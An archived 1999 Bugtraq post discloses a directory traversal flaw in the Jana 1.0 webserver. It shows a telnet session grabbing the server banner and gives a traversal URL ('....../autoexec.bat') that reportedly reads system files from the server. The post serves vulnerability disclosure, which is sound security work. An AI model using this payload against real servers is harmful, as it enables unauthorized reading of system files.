Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 1999-q3

Bugtraq Archives: Jana webserver exploit

Jana webserver exploit

Jason Lutz (jasonSPIS.NET)
Fri, 8 Oct 1999 09:00:11 -0600

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Next message: Erik Parker: "Roxen security alert"
Previous message: H D Moore: "Re: Omni-NFS/X Enterprise (nfsd.exe) DOS"

Bugtraq,

I have found a security flaw in Jana 1.0 webserver. I have not been able to find out any information on who makes this product nor a place to download the web server package. This webserver seems to be included as a suite of Internet services, one of witch I think is web-based chat. Enclosed is one exploit I have found in the limited time that I have had to deal with this web server. I am posting this information now so that one of you might know who makes this software and how I might be able to get in touch with them for further testing.

.
[[rootfoo whis]# telnet x.x.x.x 80
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
GET / HTTP/1.0

HTTP/1.0 200 OK
Date: Mon, 04 Oct 1999 18:59:44 GMT
Server: Jana Server/1.40
Last-Modified: Mon, 04 Oct 1999 15:04:40 GMT
Content-Length: 38
Content-Type: text/html
Connection: close

TESTConnection closed by foreign host. [root

foo whis]# http://server/....../autoexec.bat Prints user's autoexec.bat I would like to say thank you to rain.forest.puppy. for all his help. Jason Lutz Sprint Print Inc jason

spis.net

Next message: Erik Parker: "Roxen security alert"
Previous message: H D Moore: "Re: Omni-NFS/X Enterprise (nfsd.exe) DOS"

This archive was generated by hypermail 2.0b3 on Fri Oct 08 1999 - 16:23:30 CDT